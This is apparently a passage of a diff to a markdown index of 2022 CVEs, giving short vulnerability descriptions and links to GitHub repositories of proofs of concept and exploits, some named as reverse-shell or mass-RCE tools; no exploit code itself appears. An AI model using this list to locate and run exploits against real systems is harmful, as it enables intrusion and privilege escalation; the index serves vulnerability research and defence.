[K3ysTr0K3R/CVE-2022-34753-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-34753-EXPLOIT) + +### CVE-2022-34913 (2022-07-02) + +md2roff 1.7 has a stack-based buffer overflow via a Markdown file containing a large number of consecutive characters to be processed. NOTE: the vendor's position is that the product is not intended for untrusted input + + +- [Halcy0nic/CVE-2022-34913](https://github.com/Halcy0nic/CVE-2022-34913) + +### CVE-2022-34918 (2022-07-04) + +An issue was discovered in the Linux kernel through 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges, a different vulnerability than CVE-2022-32250. (The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access.) This can be fixed in nft_setelem_parse_data in net/netfilter/nf_tables_api.c. + + +- [randorisec/CVE-2022-34918-LPE-PoC](https://github.com/randorisec/CVE-2022-34918-LPE-PoC) +- [merlinepedra25/CVE-2022-34918-LPE-PoC](https://github.com/merlinepedra25/CVE-2022-34918-LPE-PoC) +- [merlinepedra/CVE-2022-34918-LPE-PoC](https://github.com/merlinepedra/CVE-2022-34918-LPE-PoC) +- [linulinu/CVE-2022-34918](https://github.com/linulinu/CVE-2022-34918) +- [veritas501/CVE-2022-34918](https://github.com/veritas501/CVE-2022-34918) + +### CVE-2022-34919 (2022-08-23) + +The file upload wizard in Zengenti Contensis Classic before 15.2.1.79 does not correctly check that a user has authenticated. By uploading a crafted aspx file, it is possible to execute arbitrary commands. + + +- [ahajnik/CVE-2022-34919](https://github.com/ahajnik/CVE-2022-34919) + ### CVE-2022-34961 (2022-07-25) OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Users Timeline module. @@ -1767,6 +21264,837 @@ - [bypazs/CVE-2022-34963](https://github.com/bypazs/CVE-2022-34963) +### CVE-2022-34970 (2022-08-04) + +Crow before 1.0+4 has a heap-based buffer overflow via the function qs_parse in query_string.h. On successful exploitation this vulnerability allows attackers to remotely execute arbitrary code in the context of the vulnerable service. + + +- [0xhebi/CVE-2022-34970](https://github.com/0xhebi/CVE-2022-34970) + +### CVE-2022-35131 (2022-07-25) + +Joplin v2.8.8 allows attackers to execute arbitrary commands via a crafted payload injected into the Node titles. + + +- [ly1g3/Joplin-CVE-2022-35131](https://github.com/ly1g3/Joplin-CVE-2022-35131) + +### CVE-2022-35405 (2022-07-19) + +Zoho ManageEngine Password Manager Pro before 12101 and PAM360 before 5510 are vulnerable to unauthenticated remote code execution. (This also affects ManageEngine Access Manager Plus before 4303 with authentication.) + + +- [viniciuspereiras/CVE-2022-35405](https://github.com/viniciuspereiras/CVE-2022-35405) + +### CVE-2022-35411 (2022-07-08) + +rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer: pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle. + + +- [fuzzlove/CVE-2022-35411](https://github.com/fuzzlove/CVE-2022-35411) + +### CVE-2022-35416 (2022-07-11) + +H3C SSL VPN through 2022-07-10 allows wnm/login/login.json svpnlang cookie XSS. + + +- [safe3s/CVE-2022-35416](https://github.com/safe3s/CVE-2022-35416) + +### CVE-2022-35500 (2022-11-23) + +Amasty Blog 2.10.3 is vulnerable to Cross Site Scripting (XSS) via leave comment functionality. + + +- [afine-com/CVE-2022-35500](https://github.com/afine-com/CVE-2022-35500) + +### CVE-2022-35501 (2022-11-23) + +Stored Cross-site Scripting (XSS) exists in the Amasty Blog Pro 2.10.3 and 2.10.4 plugin for Magento 2 because of the duplicate post function. + + +- [afine-com/CVE-2022-35501](https://github.com/afine-com/CVE-2022-35501) + +### CVE-2022-35513 (2022-09-07) + +The Blink1Control2 application <= 2.2.7 uses weak password encryption and an insecure method of storage. + + +- [p1ckzi/CVE-2022-35513](https://github.com/p1ckzi/CVE-2022-35513) + +### CVE-2022-35649 (2022-07-25) + +The vulnerability was found in Moodle, occurs due to improper input validation when parsing PostScript code. An omitted execution parameter results in a remote code execution risk for sites running GhostScript versions older than 9.50. Successful exploitation of this vulnerability may result in complete compromise of vulnerable system. + + +- [antoinenguyen-09/CVE-2022-35649](https://github.com/antoinenguyen-09/CVE-2022-35649) + +### CVE-2022-35698 (2022-10-14) + +Adobe Commerce versions 2.4.4-p1 (and earlier) and 2.4.5 (and earlier) are affected by a Stored Cross-site Scripting vulnerability. Exploitation of this issue does not require user interaction and could result in a post-authentication arbitrary code execution. + + +- [EmicoEcommerce/Magento-APSB22-48-Security-Patches](https://github.com/EmicoEcommerce/Magento-APSB22-48-Security-Patches) + +### CVE-2022-35737 (2022-08-03) + +SQLite 1.0.12 through 3.39.x before 3.39.2 sometimes allows an array-bounds overflow if billions of bytes are used in a string argument to a C API. + + +- [gmh5225/CVE-2022-35737](https://github.com/gmh5225/CVE-2022-35737) +- [rvermeulen/codeql-cve-2022-35737](https://github.com/rvermeulen/codeql-cve-2022-35737) + +### CVE-2022-35841 (2022-09-13) + +Windows Enterprise App Management Service Remote Code Execution Vulnerability + + +- [Wack0/CVE-2022-35841](https://github.com/Wack0/CVE-2022-35841) + +### CVE-2022-35899 (2022-07-21) + +There is an unquoted service path in ASUSTeK Aura Ready Game SDK service (GameSDK.exe) 1.0.0.4. This might allow a local user to escalate privileges by creating a %PROGRAMFILES(X86)%\ASUS\GameSDK.exe file. + + +- [angelopioamirante/CVE-2022-35899](https://github.com/angelopioamirante/CVE-2022-35899) + +### CVE-2022-35914 (2022-09-19) + +/vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection. + + +- [cosad3s/CVE-2022-35914-poc](https://github.com/cosad3s/CVE-2022-35914-poc) +- [Lzer0Kx01/CVE-2022-35914](https://github.com/Lzer0Kx01/CVE-2022-35914) +- [6E6L6F/CVE-2022-35914](https://github.com/6E6L6F/CVE-2022-35914) +- [0xGabe/CVE-2022-35914](https://github.com/0xGabe/CVE-2022-35914) +- [Johnermac/CVE-2022-35914](https://github.com/Johnermac/CVE-2022-35914) +- [senderend/CVE-2022-35914](https://github.com/senderend/CVE-2022-35914) +- [noxlumens/CVE-2022-35914_poc](https://github.com/noxlumens/CVE-2022-35914_poc) +- [btar1gan/exploit_CVE-2022-35914](https://github.com/btar1gan/exploit_CVE-2022-35914) + +### CVE-2022-35919 (2022-08-01) + +MinIO is a High Performance Object Storage released under GNU Affero General Public License v3.0. In affected versions all 'admin' users authorized for `admin:ServerUpdate` can selectively trigger an error that in response, returns the content of the path requested. Any normal OS system would allow access to contents at any arbitrary paths that are readable by MinIO process. Users are advised to upgrade. Users unable to upgrade may disable ServerUpdate API by denying the `admin:ServerUpdate` action for your admin users via IAM policies. + + +- [ifulxploit/Minio-Security-Vulnerability-Checker](https://github.com/ifulxploit/Minio-Security-Vulnerability-Checker) + +### CVE-2022-36067 (2022-09-06) + +vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. In versions prior to version 3.9.11, a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.11 of vm2. There are no known workarounds. + + +- [0x1nsomnia/CVE-2022-36067-vm2-POC-webapp](https://github.com/0x1nsomnia/CVE-2022-36067-vm2-POC-webapp) +- [Prathamrajgor/Exploit-For-CVE-2022-36067](https://github.com/Prathamrajgor/Exploit-For-CVE-2022-36067) + +### CVE-2022-36162 +- [MaherAzzouzi/CVE-2022-36162](https://github.com/MaherAzzouzi/CVE-2022-36162) + +### CVE-2022-36163 +- [MaherAzzouzi/CVE-2022-36163](https://github.com/MaherAzzouzi/CVE-2022-36163) + +### CVE-2022-36193 (2022-11-28) + +SQL injection in School Management System 1.0 allows remote attackers to modify or delete data, causing persistent changes to the application's content or behavior by using malicious SQL queries. + + +- [G37SYS73M/CVE-2022-36193](https://github.com/G37SYS73M/CVE-2022-36193) + +### CVE-2022-36200 (2022-08-29) + +In FiberHome VDSL2 Modem HG150-Ub_V3.0, Credentials of Admin are submitted in URL, which can be logged/sniffed. + + +- [afaq1337/CVE-2022-36200](https://github.com/afaq1337/CVE-2022-36200) + +### CVE-2022-36231 (2023-02-23) + +pdf_info 0.5.3 is vulnerable to Command Execution because the Ruby code uses backticks instead of Open3. + + +- [affix/CVE-2022-36231](https://github.com/affix/CVE-2022-36231) + +### CVE-2022-36234 (2022-07-28) + +SimpleNetwork TCP Server commit 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496 was discovered to contain a double free vulnerability which is exploited via crafted TCP packets. + + +- [Halcy0nic/CVE-2022-36234](https://github.com/Halcy0nic/CVE-2022-36234) + +### CVE-2022-36267 (2022-08-08) + +In Airspan AirSpot 5410 version 0.3.4.1-4 and under there exists a Unauthenticated remote command injection vulnerability. The ping functionality can be called without user authentication when crafting a malicious http request by injecting code in one of the parameters allowing for remote code execution. This vulnerability is exploited via the binary file /home/www/cgi-bin/diagnostics.cgi that accepts unauthenticated requests and unsanitized data. As a result, a malicious actor can craft a specific request and interact remotely with the device. + + +- [0xNslabs/CVE-2022-36267-PoC](https://github.com/0xNslabs/CVE-2022-36267-PoC) + +### CVE-2022-36271 (2022-09-07) + +Outbyte PC Repair Installation File 1.7.112.7856 is vulnerable to Dll Hijacking. iertutil.dll is missing so an attacker can use a malicious dll with same name and can get admin privileges. + + +- [SaumyajeetDas/POC-of-CVE-2022-36271](https://github.com/SaumyajeetDas/POC-of-CVE-2022-36271) + +### CVE-2022-36432 (2022-11-17) + +The Preview functionality in the Amasty Blog Pro 2.10.3 plugin for Magento 2 uses eval unsafely. This allows attackers to perform Cross-site Scripting attacks on admin panel users by manipulating the generated preview application response. + + +- [afine-com/CVE-2022-36432](https://github.com/afine-com/CVE-2022-36432) + +### CVE-2022-36433 (2022-11-29) + +The blog-post creation functionality in the Amasty Blog Pro 2.10.3 plugin for Magento 2 allows injection of JavaScript code in the short_content and full_content fields, leading to XSS attacks against admin panel users via posts/preview or posts/save. + + +- [afine-com/CVE-2022-36433](https://github.com/afine-com/CVE-2022-36433) + +### CVE-2022-36446 (2022-07-25) + +software/apt-lib.pl in Webmin before 1.997 lacks HTML escaping for a UI command. + + +- [p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE](https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE) +- [emirpolatt/CVE-2022-36446](https://github.com/emirpolatt/CVE-2022-36446) +- [Kang3639/CVE-2022-36446](https://github.com/Kang3639/CVE-2022-36446) + +### CVE-2022-36532 (2022-09-16) + +Bolt CMS contains a vulnerability in version 5.1.12 and below that allows an authenticated user with the ROLE_EDITOR privileges to upload and rename a malicious file to achieve remote code execution. + + +- [lutrasecurity/CVE-2022-36532](https://github.com/lutrasecurity/CVE-2022-36532) + +### CVE-2022-36537 (2022-08-26) + +ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 allows attackers to access sensitive information via a crafted POST request sent to the component AuUploader. + + +- [agnihackers/CVE-2022-36537-EXPLOIT](https://github.com/agnihackers/CVE-2022-36537-EXPLOIT) +- [Malwareman007/CVE-2022-36537](https://github.com/Malwareman007/CVE-2022-36537) + +### CVE-2022-36539 (2022-09-07) + +WeDayCare B.V Ouderapp before v1.1.22 allows attackers to alter the ID value within intercepted calls to gain access to data of other parents and children. + + +- [Fopje/CVE-2022-36539](https://github.com/Fopje/CVE-2022-36539) + +### CVE-2022-36553 (2022-08-29) + +Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi. + + +- [0xNslabs/CVE-2022-36553-PoC](https://github.com/0xNslabs/CVE-2022-36553-PoC) + +### CVE-2022-36663 (2022-09-06) + +Gluu Oxauth before v4.4.1 allows attackers to execute blind SSRF (Server-Side Request Forgery) attacks via a crafted request_uri parameter. + + +- [aqeisi/CVE-2022-36663-PoC](https://github.com/aqeisi/CVE-2022-36663-PoC) + +### CVE-2022-36752 (2022-07-28) + +png2webp v1.0.4 was discovered to contain an out-of-bounds write via the function w2p. This vulnerability is exploitable via a crafted png file. + + +- [Halcy0nic/CVE-2022-36752](https://github.com/Halcy0nic/CVE-2022-36752) + +### CVE-2022-36779 (2022-09-13) + +PROSCEND - PROSCEND / ADVICE .Ltd - G/5G Industrial Cellular Router (with GPS)4 Unauthenticated OS Command Injection Proscend M330-w / M33-W5 / M350-5G / M350-W5G / M350-6 / M350-W6 / M301-G / M301-GW ADVICE ICR 111WG / https://www.proscend.com/en/category/industrial-Cellular-Router/industrial-Cellular-Router.html https://cdn.shopify.com/s/files/1/0036/9413/3297/files/ADVICE_Industrial_4G_LTE_Cellular_Router_ICR111WG.pdf?v=1620814301 + + +- [rootDR/CVE-2022-36779](https://github.com/rootDR/CVE-2022-36779) +- [EmadYaY/CVE-2022-36779](https://github.com/EmadYaY/CVE-2022-36779) + +### CVE-2022-36804 (2022-08-25) + +Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew. + + +- [notdls/CVE-2022-36804](https://github.com/notdls/CVE-2022-36804) +- [notxesh/CVE-2022-36804-PoC](https://github.com/notxesh/CVE-2022-36804-PoC) +- [JRandomSage/CVE-2022-36804-MASS-RCE](https://github.com/JRandomSage/CVE-2022-36804-MASS-RCE) +- [benjaminhays/CVE-2022-36804-PoC-Exploit](https://github.com/benjaminhays/CVE-2022-36804-PoC-Exploit) +- [Vulnmachines/bitbucket-cve-2022-36804](https://github.com/Vulnmachines/bitbucket-cve-2022-36804) +- [kljunowsky/CVE-2022-36804-POC](https://github.com/kljunowsky/CVE-2022-36804-POC) +- [Chocapikk/CVE-2022-36804-ReverseShell](https://github.com/Chocapikk/CVE-2022-36804-ReverseShell) +- [khal4n1/CVE-2022-36804](https://github.com/khal4n1/CVE-2022-36804) +- [0xEleven/CVE-2022-36804-ReverseShell](https://github.com/0xEleven/CVE-2022-36804-ReverseShell) +- [tahtaciburak/cve-2022-36804](https://github.com/tahtaciburak/cve-2022-36804) +- [Inplex-sys/CVE-2022-36804](https://github.com/Inplex-sys/CVE-2022-36804) +- [ColdFusionX/CVE-2022-36804](https://github.com/ColdFusionX/CVE-2022-36804) +- [devengpk/CVE-2022-36804](https://github.com/devengpk/CVE-2022-36804) +- [walnutsecurity/cve-2022-36804](https://github.com/walnutsecurity/cve-2022-36804) +- [imbas007/Atlassian-Bitbucket-CVE-2022-36804](https://github.com/imbas007/Atlassian-Bitbucket-CVE-2022-36804) + +### CVE-2022-36944 (2022-09-23) + +Scala 2.13.x before 2.13.9 has a Java deserialization chain in its JAR file. On its own, it cannot be exploited. There is only a risk in conjunction with Java object deserialization within an application. In such situations, it allows attackers to erase contents of arbitrary files, make network connections, or possibly run arbitrary code (specifically, Function0 functions) via a gadget chain. + + +- [yarocher/lazylist-cve-poc](https://github.com/yarocher/lazylist-cve-poc) + +### CVE-2022-36946 (2022-07-27) + +nfqnl_mangle in net/netfilter/nfnetlink_queue.c in the Linux kernel through 5.18.14 allows remote attackers to cause a denial of service (panic) because, in the case of an nf_queue verdict with a one-byte nfta_payload attribute, an skb_pull can encounter a negative skb->len. + + +- [Pwnzer0tt1/CVE-2022-36946](https://github.com/Pwnzer0tt1/CVE-2022-36946) +- [Satheesh575555/linux-4.19.72_CVE-2022-36946](https://github.com/Satheesh575555/linux-4.19.72_CVE-2022-36946) + +### CVE-2022-37017 (2022-12-01) + +Symantec Endpoint Protection (Windows) agent, prior to 14.3 RU6/14.3 RU5 Patch 1, may be susceptible to a Security Control Bypass vulnerability, which is a type of issue that can potentially allow a threat actor to circumvent existing security controls. This CVE applies narrowly to the Client User Interface Password protection and Policy Import/Export Password protection, if it has been enabled. + + +- [apeppels/CVE-2022-37017](https://github.com/apeppels/CVE-2022-37017) + +### CVE-2022-37032 (2022-09-19) + +An out-of-bounds read in the BGP daemon of FRRouting FRR before 8.4 may lead to a segmentation fault and denial of service. This occurs in bgp_capability_msg_parse in bgpd/bgp_packet.c. + + +- [spwpun/CVE-2022-37032](https://github.com/spwpun/CVE-2022-37032) + +### CVE-2022-37042 (2022-08-11) + +Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925. + + +- [GreyNoise-Intelligence/Zimbra_CVE-2022-37042-_CVE-2022-27925](https://github.com/GreyNoise-Intelligence/Zimbra_CVE-2022-37042-_CVE-2022-27925) +- [aels/CVE-2022-37042](https://github.com/aels/CVE-2022-37042) +- [0xf4n9x/CVE-2022-37042](https://github.com/0xf4n9x/CVE-2022-37042) + +### CVE-2022-37177 (2022-08-29) + +HireVue Hiring Platform V1.0 suffers from Use of a Broken or Risky Cryptographic Algorithm. NOTE: this is disputed by the vendor for multiple reasons, e.g., it is inconsistent with CVE ID assignment rules for cloud services, and no product with version V1.0 exists. Furthermore, the rail-fence cipher has been removed, and TLS 1.2 is now used for encryption. + + +- [JC175/CVE-2022-37177](https://github.com/JC175/CVE-2022-37177) + +### CVE-2022-37201 (2022-09-15) + +JFinal CMS 5.1.0 is vulnerable to SQL Injection. + + +- [AgainstTheLight/CVE-2022-37201](https://github.com/AgainstTheLight/CVE-2022-37201) + +### CVE-2022-37202 (2022-10-26) + +JFinal CMS 5.1.0 is vulnerable to SQL Injection via /admin/advicefeedback/list + + +- [AgainstTheLight/CVE-2022-37202](https://github.com/AgainstTheLight/CVE-2022-37202) + +### CVE-2022-37203 (2022-09-19) + +JFinal CMS 5.1.0 is vulnerable to SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection. + + +- [AgainstTheLight/CVE-2022-37203](https://github.com/AgainstTheLight/CVE-2022-37203) + +### CVE-2022-37204 (2022-09-20) + +Final CMS 5.1.0 is vulnerable to SQL Injection. + + +- [AgainstTheLight/CVE-2022-37204](https://github.com/AgainstTheLight/CVE-2022-37204) + +### CVE-2022-37205 (2022-09-20) + +JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection. + + +- [AgainstTheLight/CVE-2022-37205](https://github.com/AgainstTheLight/CVE-2022-37205) + +### CVE-2022-37206 +- [AgainstTheLight/CVE-2022-37206](https://github.com/AgainstTheLight/CVE-2022-37206) + +### CVE-2022-37207 (2022-09-15) + +JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection + + +- [AgainstTheLight/CVE-2022-37207](https://github.com/AgainstTheLight/CVE-2022-37207) + +### CVE-2022-37208 (2022-10-13) + +JFinal CMS 5.1.0 is vulnerable to SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection. + + +- [AgainstTheLight/CVE-2022-37208](https://github.com/AgainstTheLight/CVE-2022-37208) + +### CVE-2022-37209 (2022-09-27) + +JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection. + + +- [AgainstTheLight/CVE-2022-37209](https://github.com/AgainstTheLight/CVE-2022-37209) + +### CVE-2022-37210 +- [AgainstTheLight/CVE-2022-37210](https://github.com/AgainstTheLight/CVE-2022-37210) + +### CVE-2022-37298 (2022-10-20) + +Shinken Solutions Shinken Monitoring Version 2.4.3 affected is vulnerable to Incorrect Access Control. The SafeUnpickler class found in shinken/safepickle.py implements a weak authentication scheme when unserializing objects passed from monitoring nodes to the Shinken monitoring server. + + +- [dbyio/cve-2022-37298](https://github.com/dbyio/cve-2022-37298) + +### CVE-2022-37332 (2022-11-21) + +A use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader, version 12.0.1.12430. A specially-crafted PDF document can trigger the reuse of previously freed memory via misusing media player API, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted, malicious site if the browser plugin extension is enabled. + + +- [SpiralBL0CK/CVE-2022-37332-RCE-](https://github.com/SpiralBL0CK/CVE-2022-37332-RCE-) + +### CVE-2022-37434 (2022-08-05) + +zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference). + + +- [xen0bit/CVE-2022-37434_poc](https://github.com/xen0bit/CVE-2022-37434_poc) +- [Trinadh465/external_zlib_android-6.0.1_r22_CVE-2022-37434](https://github.com/Trinadh465/external_zlib_android-6.0.1_r22_CVE-2022-37434) +- [Trinadh465/external_zlib_CVE-2022-37434](https://github.com/Trinadh465/external_zlib_CVE-2022-37434) + +### CVE-2022-37703 (2022-09-13) + +In Amanda 3.5.1, an information leak vulnerability was found in the calcsize SUID binary. An attacker can abuse this vulnerability to know if a directory exists or not anywhere in the fs. The binary will use `opendir()` as root directly without checking the path, letting the attacker provide an arbitrary path. + + +- [MaherAzzouzi/CVE-2022-37703](https://github.com/MaherAzzouzi/CVE-2022-37703) + +### CVE-2022-37704 (2023-04-16) + +Amanda 3.5.1 allows privilege escalation from the regular user backup to root. The SUID binary located at /lib/amanda/rundump will execute /usr/sbin/dump as root with controlled arguments from the attacker which may lead to escalation of privileges, denial of service, and information disclosure. + + +- [MaherAzzouzi/CVE-2022-37704](https://github.com/MaherAzzouzi/CVE-2022-37704) + +### CVE-2022-37705 (2023-04-16) + +A privilege escalation flaw was found in Amanda 3.5.1 in which the backup user can acquire root privileges. The vulnerable component is the runtar SUID program, which is a wrapper to run /usr/bin/tar with specific arguments that are controllable by the attacker. This program mishandles the arguments passed to tar binary (it expects that the argument name and value are separated with a space; however, separating them with an equals sign is also supported), + + +- [MaherAzzouzi/CVE-2022-37705](https://github.com/MaherAzzouzi/CVE-2022-37705) + +### CVE-2022-37706 (2022-12-25) + +enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring. + + +- [MaherAzzouzi/CVE-2022-37706-LPE-exploit](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit) +- [ECU-10525611-Xander/CVE-2022-37706](https://github.com/ECU-10525611-Xander/CVE-2022-37706) +- [junnythemarksman/CVE-2022-37706](https://github.com/junnythemarksman/CVE-2022-37706) +- [TACTICAL-HACK/CVE-2022-37706-SUID](https://github.com/TACTICAL-HACK/CVE-2022-37706-SUID) +- [sanan2004/CVE-2022-37706](https://github.com/sanan2004/CVE-2022-37706) +- [KaoXx/CVE-2022-37706](https://github.com/KaoXx/CVE-2022-37706) +- [d3ndr1t30x/CVE-2022-37706](https://github.com/d3ndr1t30x/CVE-2022-37706) + +### CVE-2022-37708 +- [thekevinday/docker_lightman_exploit](https://github.com/thekevinday/docker_lightman_exploit) + +### CVE-2022-37969 (2022-09-13) + +Windows Common Log File System Driver Elevation of Privilege Vulnerability + + +- [fortra/CVE-2022-37969](https://github.com/fortra/CVE-2022-37969) + +### CVE-2022-38029 (2022-10-11) + +Windows ALPC Elevation of Privilege Vulnerability + + +- [SpiralBL0CK/SIDECHANNEL-CVE-2022-38029](https://github.com/SpiralBL0CK/SIDECHANNEL-CVE-2022-38029) + +### CVE-2022-38181 (2022-10-25) + +The Arm Mali GPU kernel driver allows unprivileged users to access freed memory because GPU memory operations are mishandled. This affects Bifrost r0p0 through r38p1, and r39p0; Valhall r19p0 through r38p1, and r39p0; and Midgard r4p0 through r32p0. + + +- [Pro-me3us/CVE_2022_38181_Raven](https://github.com/Pro-me3us/CVE_2022_38181_Raven) +- [Pro-me3us/CVE_2022_38181_Gazelle](https://github.com/Pro-me3us/CVE_2022_38181_Gazelle) +- [R0rt1z2/CVE-2022-38181](https://github.com/R0rt1z2/CVE-2022-38181) + +### CVE-2022-38374 (2022-11-02) + +A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiADC 7.0.0 - 7.0.2 and 6.2.0 - 6.2.4 allows an attacker to execute unauthorized code or commands via the URL and User fields observed in the traffic and event logviews. + + +- [azhurtanov/CVE-2022-38374](https://github.com/azhurtanov/CVE-2022-38374) +- [M4fiaB0y/CVE-2022-38374](https://github.com/M4fiaB0y/CVE-2022-38374) + +### CVE-2022-38553 (2022-09-26) + +Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter. + + +- [4websecurity/CVE-2022-38553](https://github.com/4websecurity/CVE-2022-38553) + +### CVE-2022-38577 (2022-09-19) + +ProcessMaker before v3.5.4 was discovered to contain insecure permissions in the user profile page. This vulnerability allows attackers to escalate normal users to Administrators. + + +- [sornram9254/CVE-2022-38577-Processmaker](https://github.com/sornram9254/CVE-2022-38577-Processmaker) + +### CVE-2022-38601 +- [jet-pentest/CVE-2022-38601](https://github.com/jet-pentest/CVE-2022-38601) + +### CVE-2022-38604 (2023-04-11) + +Wacom Driver 6.3.46-1 for Windows and lower was discovered to contain an arbitrary file deletion vulnerability. + + +- [LucaBarile/CVE-2022-38604](https://github.com/LucaBarile/CVE-2022-38604) + +### CVE-2022-38691 +- [TomKing062/CVE-2022-38691_38692](https://github.com/TomKing062/CVE-2022-38691_38692) + +### CVE-2022-38694 +- [TomKing062/CVE-2022-38694_unlock_bootloader](https://github.com/TomKing062/CVE-2022-38694_unlock_bootloader) +- [TheGammaSqueeze/Bootloader_Unlock_Anbernic_T820](https://github.com/TheGammaSqueeze/Bootloader_Unlock_Anbernic_T820) + +### CVE-2022-38725 (2023-01-23) + +An integer overflow in the RFC3164 parser in One Identity syslog-ng 3.0 through 3.37 allows remote attackers to cause a Denial of Service via crafted syslog input that is mishandled by the tcp or network function. syslog-ng Premium Edition 7.0.30 and syslog-ng Store Box 6.10.0 are also affected. + + +- [wdahlenburg/CVE-2022-38725](https://github.com/wdahlenburg/CVE-2022-38725) + +### CVE-2022-38766 (2023-01-03) + +The remote keyless system on Renault ZOE 2021 vehicles sends 433.92 MHz RF signals from the same Rolling Codes set for each door-open request, which allows for a replay attack. + + +- [MalHyuk/CVE-2022-38766](https://github.com/MalHyuk/CVE-2022-38766) + +### CVE-2022-38789 (2022-09-15) + +An issue was discovered in Airties Smart Wi-Fi before 2020-08-04. It allows attackers to change the main/guest SSID and the PSK to arbitrary values, and map the LAN, because of Insecure Direct Object Reference. + + +- [ProxyStaffy/Airties-CVE-2022-38789](https://github.com/ProxyStaffy/Airties-CVE-2022-38789) + +### CVE-2022-38813 (2022-11-25) + +PHPGurukul Blood Donor Management System 1.0 does not properly restrict access to admin/dashboard.php, which allows attackers to access all data of users, delete the users, add and manage Blood Group, and Submit Report. + + +- [RashidKhanPathan/CVE-2022-38813](https://github.com/RashidKhanPathan/CVE-2022-38813) + +### CVE-2022-39066 (2022-11-22) + +There is a SQL injection vulnerability in ZTE MF286R. Due to insufficient validation of the input parameters of the phonebook interface, an authenticated attacker could use the vulnerability to execute arbitrary SQL injection. + + +- [v0lp3/CVE-2022-39066](https://github.com/v0lp3/CVE-2022-39066) + +### CVE-2022-39073 (2023-01-06) + +There is a command injection vulnerability in ZTE MF286R, Due to insufficient validation of the input parameters, an attacker could use the vulnerability to execute arbitrary commands. + + +- [v0lp3/CVE-2022-39073](https://github.com/v0lp3/CVE-2022-39073) + +### CVE-2022-39196 (2022-09-04) + +Blackboard Learn 1.10.1 allows remote authenticated users to read unintended files by entering student credentials and then directly visiting a certain webapps/bbcms/execute/ URL. Note: The vendor disputes this stating this cannot be reproduced. + + +- [DayiliWaseem/CVE-2022-39196-](https://github.com/DayiliWaseem/CVE-2022-39196-) + +### CVE-2022-39197 (2022-09-22) + +An XSS (Cross Site Scripting) vulnerability was found in HelpSystems Cobalt Strike through 4.7 that allowed a remote attacker to execute HTML on the Cobalt Strike teamserver. To exploit the vulnerability, one must first inspect a Cobalt Strike payload, and then modify the username field in the payload (or create a new payload with the extracted information and then modify that username field to be malformed). + + +- [safe3s/CVE-2022-39197](https://github.com/safe3s/CVE-2022-39197) +- [zeoday/cobaltstrike4.5_cdf-1](https://github.com/zeoday/cobaltstrike4.5_cdf-1) +- [burpheart/cve-2022-39197](https://github.com/burpheart/cve-2022-39197) +- [xzajyjs/CVE-2022-39197-POC](https://github.com/xzajyjs/CVE-2022-39197-POC) +- [yqcs/CSPOC](https://github.com/yqcs/CSPOC) +- [purple-WL/Cobaltstrike-RCE-CVE-2022-39197](https://github.com/purple-WL/Cobaltstrike-RCE-CVE-2022-39197) +- [lovechoudoufu/about_cobaltstrike4.5_cdf](https://github.com/lovechoudoufu/about_cobaltstrike4.5_cdf) +- [burpheart/CVE-2022-39197-patch](https://github.com/burpheart/CVE-2022-39197-patch) +- [hluwa/cobaltstrike_swing_xss2rce](https://github.com/hluwa/cobaltstrike_swing_xss2rce) +- [4nth0ny1130/CVE-2022-39197-fix_patch](https://github.com/4nth0ny1130/CVE-2022-39197-fix_patch) +- [its-arun/CVE-2022-39197](https://github.com/its-arun/CVE-2022-39197) +- [TheCryingGame/CVE-2022-39197-RCE](https://github.com/TheCryingGame/CVE-2022-39197-RCE) +- [adeljck/CVE-2022-39197](https://github.com/adeljck/CVE-2022-39197) +- 